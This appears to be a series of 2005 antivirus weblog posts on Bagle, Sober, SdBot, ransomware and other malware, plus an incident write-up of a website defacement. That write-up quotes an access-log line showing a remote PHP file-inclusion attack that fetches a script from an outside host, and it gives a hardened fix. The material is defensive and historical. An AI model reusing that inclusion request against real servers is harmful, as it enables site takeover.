During the past hours, we've intercepted a flurry of new Bagle variants; apparently, it's been a busy day for the author, who keeps sending them out.
Additionally, one of the URLs which all these variants monitor for updates has come online, with yet another (yes, you've guessed) Bagle variant - Bagle.bp.
So far the situation appears under control - the speed of reaction from antivirus companies in this case was outstanding. Except for the initial seeding waves, there is no sign of an outbreak. Stay tuned for more details.
Two new Bagle variants have been spotted today. Both are 36352 bytes in size and are very similar in operation; the second one looks like a repack of the first, intended to avoid detection. Both work through a downloader component, which connects to a set of websites and attempts to fetch a file. Just as usually happens with Sober, the author may choose to upload a trojan with unexpected effects to the "update" URLs. We are currently monitoring them for any changes.
Below you can find the MD5s for these two new variants:
f4271a7bd37b7502ecab0ec2964d87c6 - first sample
71379e8529c54c80ead31f5499e3406b - second sample
We released detection for the most recent version at 18:59.
[update] A description for Bagle.bo is now available in the Virus Encyclopedia.
I read about a case of computer fraud last weekend in an unlikely place: the parish bulletin of my local church. It seems that the priest's name, and the postal address of the church, are being used in a way that is part 419 fraud, part identity theft and part phishing scam.
Unsolicited email is being sent from fake, though plausible, e-mail addresses. The email is apparently 'signed' by the priest and tells the recipients about a legacy they are about to receive, or asks for help in a financial transaction or simply asks for a donation.
The priest found out about it when someone in Australia decided to do some checking. He has reported the fraud to the police and the fake email accounts known so far (there may, of course, be others) have been closed down.
I'll keep you posted about any developments.
Today we've been getting more and more reports of a particular Backdoor.Win32.SdBot variant spreading.
This SdBot is packed using UPX, Upolyx and Morphine, we detect it using our generic signature as Backdoor.Win32.SdBot.gen.
This is a true hybrid worm, as it contains many functions: first the IRCBot, which can spread over the network; in addition, it has AIM and P2P spreading capabilities.
Embedded in the bot is an IM-Worm.Win32.Kelvir variant and a rootkit to stealth the presence on the system.
This worm was actively spreading over IRC yesterday, and today the target seems to be the MSN network; in both cases it spreads as a link to a website.
Luckily the offending website has been taken down now, but that hasn't prevented a major spread. I received quite a lot of reports from the Netherlands.
The danger is not over, as this complete package is difficult to get off the system. Kaspersky Anti-Virus users were proactively protected from installation onto the system.
In the last week or so, new trends in using IM (instant messaging) applications to spread malicious code have been on the rise.
Firstly, we've been seeing IRCBots which have the ability to spread via AOL Instant Messenger.
Some of these bots get classified as IM-Worms. But in my opinion, these are standard IRCBots which we see every day. It's just that they have added functionality and the remote malicious user has the ability to tell the bot to start the IM spreading routine.
The bot's code contains a text sentence, which in turn contains an HTML link. The remote malicious user fills this link with the URL of his or her choice; what the AOL user receives is the sentence complete with link. There's a wide variety of sentences used.
As AIM supports HTML, it's not surprising that it's being exploited for malicious purposes. And it's yet another reason not to use HTML in normal messaging.
Secondly, we've spotted a new version of IM-Worm.Win32.Bropia, Bropia.ad, which utilizes yet another tactic.
Bropia.ad copies itself - using a range of different filenames - to the shared directories of popular P2P programs, which obviously means it has P2P-Worm capabilities.
As P2P is a popular way of spreading and not that difficult to implement, the addition of such a propagation routine was only a matter of time.
Now we're on the lookout for the next new tactic which blackhats will think up. As IM malware continues to evolve, new approaches are a matter of sooner, rather than later.
Exactly a year ago Rugrat, the first virus for Win64 platforms, was detected: Virus.Win64.Rugrat.a was a proof of concept virus written in assembler for IA64. As the first of its kind, it naturally attracted the attention of antivirus companies.
Rugrat was written by a member of 29A, the international group which specializes in producing proof-of-concept code. The author of Rugrat also created the Virus.Win32.Chiton family.
Although Rugrat was interesting as the first of its kind, it never became widespread, because Win64 users are few and far between.
While we're on the subject of the Aids Information Disk ...
I recall a cautionary tale told by someone who called into the company I worked for then (a UK anti-virus company that has since been acquired by another well-known company). The caller had received one of the Trojan floppy disks. He was suspicious about it, so he threw it in the bin. Good idea, right? Unfortunately, one of his employees decided to retrieve the disk and run the program, with predictable results.
At the time, I was new to the security industry. And this story served to reinforce the 'proper paranoid attitude' cultivated by the company I worked for: assume nothing and leave nothing to chance! It also reinforced the message about backups, and that message is as valid today as it was then. The payload of Trojans like Virus.Win32.GPCode highlights the importance of taking backups (along with having an up-to-date antivirus, a personal firewall and patched systems).
Anyone who has ever lost data understands how important it is to back up regularly.
There have been a number of recent reports of a new attempt to extort money from computer users. It's done using a piece of malware which, once installed on the victim machine, encrypts the user's data and drops a text file into each directory demanding $200 for a decryption key (the money to be wired to a specified Internet bank account).
Kaspersky Lab added detection for this code, which we detect as Virus.Win32.GPCode.b, on 20 May. And we added detection for similar code, Virus.Win32.GPCode.a, in December 2004. At the time, Yury posted a weblog entry about it. Not only do we detect the code, but we also decrypt the files.
Of course, this is not the first attempt to use malware to extort money. There have been other reports during the last two years of Trojans used by the criminal underground to try and extort money from large corporations by launching DDoS (Distributed Denial of Service) attacks.
And going even further back, in late 1989 the Aids Information Trojan was sent out on floppy disk by a company calling itself 'PC Cyborg'. This Trojan encrypted the contents of the victim's hard disk after 90 re-boots, leaving just a README file containing a bill and a PO Box address in Panama to which payment was to be sent. Dr Joseph Popp, the alleged author of the Trojan, was later extradited to the UK. However, he was deemed unfit to stand trial following his behaviour in court (although an Italian court later found him guilty in absentia).
We've been seeing a lot of new Mytob variants recently. It's less than three months since we added detection for Mytob.a and already we're well into double figures. In the last day or so we've added detection for Mytob.au (and there's a lot of Mytob.au out there!), Mytob.av and Mytob.aw. If it were not for generic signatures, there would be a lot more!
Generic detection lets us detect multiple variants of the same malware family using a single virus definition ... sometimes tens or even hundreds of threats! The use of hundreds of unpackers within the Kaspersky® antivirus engine has the same effect: re-packed variants are often detected without the need for a new definition.
The down side is that the suffix used to identify some new threats may not match that used by other antivirus vendors. This is especially true for 'successful' threats that spawn large numbers of variants.
In the meantime Sober.q has become active; instead of sending copies of itself, it's now sending spam messages.
This is quite the opposite from the message the Sober author included in his latest creation.
These spam messages link to right-wing articles.
So in a way we're seeing the same story as with Sober.g again.
Sober.g downloaded Sober.h, Sober.h in turn also sent out spam.
I can remember that the Netherlands were completely flooded by those emails back then; judging from the numbers that Sober.p generated just before it stopped, it probably won't be that much different this time.
After some analysis it seems that Sober.q hasn't begun spreading yet.
Probably the author only wants the Worm to start spreading when enough computers have been infected with it.
That way it may prove more effective, but it also opens up a bigger window of opportunity for the anti-virus vendors to respond.
The other interesting thing about Sober.q is that it contains a message. It's a message in German in which the author refers to some online articles which state he is a spammer. He states that he is not a spammer, but might turn into one.
It's not the first time the Sober author has included a message in his creations; a previous message was aimed at the anti-virus vendors.
We have just detected a new Email-Worm.Win32.Sober variant, which we detect as Sober.q.
Sober.q is being downloaded by Sober.p infected computers, from there on it will start spreading. Another outbreak is not unlikely, we are watching the situation closely.
An urgent update has just been shipped.
Trojan-Downloader.Win32.BMPAgent.a appeared exactly a year ago today.
This Trojan downloader was interesting, as it came in a new package - it arrived as a BMP file. When the file was viewed, the malicious code contained within the image would be launched, which would in turn download and install other files to the victim machine.
Agent was written to exploit a vulnerability in the way in which certain versions of Internet Explorer/Outlook Express process graphics files. Three months after the vulnerability was detected, Microsoft issued a patch for it.
Although Agent had a novel approach, it never became really widespread, in great part due to the fact that Microsoft patched the vulnerability.
The Fire of London began on the night of September 2, 1666, as a small fire on Pudding Lane, in the bakeshop of Thomas Farynor, who was King Charles II's baker. The story goes that one of the servants woke up around midnight to find the house on fire. By eight o'clock the next day, the fire had spread halfway across London Bridge, destroying around 80% of the city and killing nearly a fifth of the population. An example of how quickly a minor incident can turn into a major disaster.
The Mozilla Foundation Security Advisories 2005-43 and 2005-44 deal with two serious vulnerabilities in the popular Firefox browser, versions up to and including 1.0.3. The vulnerabilities were announced last weekend, and it has taken the Firefox developers four long days to develop a patch, test it and release it to the public.
In a normal development cycle, four days from the start of patch development to the release of a fix is an extremely short period of time. In comparison, Internet Explorer patches are released on a monthly basis, and it's not uncommon to wait as long as three weeks for a fix to a critical security bug. Of course, this methodical development cycle is one of the reasons why many users have switched to Firefox, and it's encouraging to see the level of dedication and commitment the Mozilla developers put into maintaining the security of their products.
In a world where virus writers, adware developers and hackers are constantly searching for ways to infect your systems, a timely response to security issues is a must. Sometimes even a day, or even an extra hour, can matter. And sure enough, there are reports of the above mentioned Firefox bugs already being exploited on the Internet. I don't want to think what might have happened if we had had to wait another month for the patch.
You can get the Firefox 1.0.4 update here.
A few days ago we mentioned the protection mechanism that Sober uses to keep anti-virus programs from detecting it. Such mechanisms are actually fairly common these days.
They are frequently used by adware and adware related Trojans. These techniques have evolved over time and are getting very sophisticated. So antivirus vendors are having to work hard to combat these new methods.
There's a range of interesting examples.
When some AdWare companies realised that antivirus solutions could easily delete their software, they first resorted to multiple processes guarding each other.
If either process/file is deleted, the other one would automatically respawn it. This technique is still being used in an enhanced form.
Of course there's the Sober approach: protecting a file in such a manner that it can't be scanned. For instance, some versions of Trojan-Downloader.Win32.Istbar do this, and have an additional mechanism which aims to prevent the process memory from being scanned.
A version of AdWare.Isearch effectively re-introduced an old technique.
It makes use of a .sys driver which write-protects its files. This means that an antivirus can detect the files, but not delete them. These .sys drivers are also used to hide malware and its activities - resulting in the very popular rootkits.
There are many more examples of how malware tries to protect itself. It's very clear that such techniques are placing pressure on security vendors to push the envelope in detection.
The use of .sys drivers has been increasing over the past few months. We are now at a point where open source IRCBots are also using this functionality to hide their presence in infected systems and this is a very worrying trend.
Sober.p currently is not spreading. After days of sending out emails, it's now checking for updates at predefined locations, which indicates that more malware is likely to follow.
But one week after Email-Worm.Win32.Sober.p's initial sighting it seemed more prevalent than ever. Why is this?
Firstly, the worm's continued spread shows that there still aren't enough companies running antivirus solutions on their mail servers as they could have stopped the spreading days ago.
Secondly, from a social engineering point of view it's pretty good. The bilingual messages - English and German - always seem to have a certain amount of success - almost all Sober variants have hit Germany and the countries surrounding it very hard.
This time Sober also takes advantage of the World Cup football which will be held in Germany in 2006. However, my personal email addresses were bombarded with Sober.p emails, yet I didn't receive a single sample regarding the World Cup.
Other email worms which have used similar social engineering tactics haven't been this successful by a long shot. I think Sober.p's real success is due to something else, namely its protection mechanism.
As with previous Sober variants, Sober.p makes use of a certain mechanism to lock out any I/O access to its files.
In other words: other programs can't access Sober's files. Not even applications running under the SYSTEM account can access them while Sober is resident in memory.
This mechanism has been improved over time - earlier variants of Sober couldn't stop SYSTEM from accessing its files.
And what's the result? Very simple; if something can't be scanned, then malicious code can't be detected. This rules out the chance of Sober being detected while running an on-demand scan. So what now? This is where the quality of an anti-virus's memory scanner comes in.
First the solution needs to detect Sober running in memory, then it has to kill the processes.
This is where some antivirus programs are failing; either they don't have a memory scanner, or the scanner has limited functionality which isn't able to kill the processes.
If you aren't aware of infection, how can you take measures against it? With Sober's protection mechanism making it able to outsmart some antivirus scanners, it's likely we haven't seen the last of this family yet.
Yesterday, a website where one of my friends is a webmaster was hacked. Actually, to be more precise, the site was "defaced", meaning the hacker replaced the standard entry page with one of his choice. Such replacement pages usually proclaim the hacker's intelligence and technical "skillz". This is an extremely popular technique and some hackers even warn the site owners before doing it, giving them a fair chance to close the bug.
Generally speaking, when a site is hacked the first step is to locate the exact method used by the attacker and immediately close any loopholes. Of course, preserving the logs and the appearance of the hacked site is also essential, in case legal action needs to be taken later. Finally, it is important to determine whether the hacker installed a backdoor, which allows later access to the system even after the security hole has been closed, and to kill it.
My friend's site was hosted by a serious ISP and the machine itself was running the latest versions of Linux, Apache, PHP, MySQL, SSH, Perl and every other popular piece of software which comes by default in a standard hosting account.
Therefore, it was obvious from the start that the chance of having been attacked through a flaw in the hosting system was close to zero.
After poking through the logs for a little while, we located the first index reload after the hack and noticed that it was coming through a free anonymous proxy-based browsing service. Being a site about photography and art in general, it seemed to me that it was unlikely for somebody to browse it through an anonymizer service. I did a quick search for all the entries coming from the respective anonymous proxy IP address, and sure enough, the following did seem interesting:
82.96.x.x - - [07/May/2005:00:53:36 -0700] "GET /x_open.php?art=http://geocities.com/...[true link removed]
"x_open.php" from above is a general purpose script which integrates new articles into the site layout. Basically, it takes an article and draws a menu, a toolbar and other page components around it. The bug? Well, the PHP directive "include" doesn't care whether the parameter is a local file or a remote one. It will happily download something remote and execute it on the local machine within the context of the initial script. The same is true for many other PHP functions, which are powerful enough to handle a local or a remote file in the same manner. When the PHP code for my friend's website was written, the programmer probably forgot about this "feature"; the code created was seriously flawed, leaving the server vulnerable. It took only a few months before a hacker noted the peculiar URL structure (a .php script receiving another .php script as a parameter) and misused it to deface the website.
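As an added illustration (not the code from the friend's site or from Kaspersky), here is the include pattern the post describes next to a hardened article loader; the parameter name "art" follows the log entry above, while the "articles" directory layout and PHP 7.1 or later are assumptions:

```php
<?php
// Added example, not the site's original x_open.php.
// Assumed layout: articles live as ./articles/<slug>.php; the request
// parameter is "art", as in the log entry quoted in the post.

// Vulnerable pattern the post describes (shown only for contrast):
//   include($_GET['art']);
// With allow_url_fopen enabled, include() fetches "http://..." and
// executes the result in the script's context; a plain filename reaches
// any readable local file as well.

const ARTICLE_DIR = __DIR__ . '/articles';

/**
 * Map the "art" parameter to a file that is guaranteed to lie inside
 * ARTICLE_DIR. Returns the canonical path, or null to reject the request.
 */
function resolve_article(string $art): ?string
{
    // 1. Refuse anything carrying a scheme (http:, ftp:, php:, data:, ...),
    //    so remote files and PHP stream wrappers are never reachable.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $art)) {
        return null;
    }
    // 2. Accept only a bare slug: no slashes, no "..", no NUL bytes.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $art)) {
        return null;
    }
    // 3. Defence in depth: canonicalise and confirm the file is still
    //    under ARTICLE_DIR (catches symlinks pointing elsewhere).
    $base = realpath(ARTICLE_DIR);
    $real = realpath(ARTICLE_DIR . '/' . $art . '.php');
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

$file = resolve_article($_GET['art'] ?? '');
if ($file === null) {
    http_response_code(404);
    exit('No such article');
}
// ... draw the menu, toolbar and other page components here ...
include $file;
```

Turning off allow_url_fopen (and, on PHP 5.2 and later, allow_url_include) in php.ini removes the remote half of the problem server-wide, but the path check is still needed to keep the script from opening arbitrary local files.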
We've repaired the code to prevent opening of arbitrary files from the web or even the local machine, fixed the same bug in a dozen other scripts, sent a complaint to Geocities for hosting the trojan PHP script which was injected in the server and contacted the owners of anonymous proxy forwarder to obtain the original IP address used by the hacker. With a little bit of luck, we'll be able to locate the attacker and thank him accordingly.
As for the moral of this story? Well, PHP is a very powerful programming language and it can be used to design really wonderful things - the software equivalent of a very sharp cutting tool. Yet, if not used properly, it can be just as dangerous.
With that in mind, PHPBB has just released version 2.0.15 which fixes (among other things) one serious bug. If you run PHPBB, update as soon as possible: Download PHPBB 2.0.15
Social engineering, a non-technical breach of security that relies heavily on human interaction and tricks users into breaking normal security measures, remains popular among virus writers.
Five years ago today LoveLetter was detected. The worm first appeared in the far east and quickly reached epidemic proportions.
LoveLetter was one of the first, and most notable, examples of social engineering. It arrived as an attachment to an innocent looking e-mail containing the subject line 'I LOVE YOU' (and who doesn't like to receive a love letter?) and the body text 'Kindly check the attached LOVELETTER coming from me'.
In an effort to put unsuspecting users further off their guard, the attachment had a double extension, LOVE-LETTER-FOR-YOU.TXT.vbs. Since Windows Explorer doesn't show extensions by default, it was not obvious that the attachment was anything more than a plain text file. For good measure, LoveLetter also used mIRC to spread and downloaded a password stealing Trojan to the infected machine.
Successful threats (from the author's point of view, that is) typically spawn further variants. LoveLetter's success, together with the fact that the VBS source code for the worm was easily accessible, led to a large number of variants in the months following its release.
LoveLetter showed how useful social engineering can be in spreading malware. So it's not surprising that it continues to be widely used. Sober.p, which has caused outbreaks in various western European countries, owes some of its success to social engineering. It arrives as an attachment to infected messages which use a range of subject headers, messages and attachment names in both English and German. Some of the messages appear to promise tickets to the World Cup in 2006 - and who wouldn't want World Cup tickets?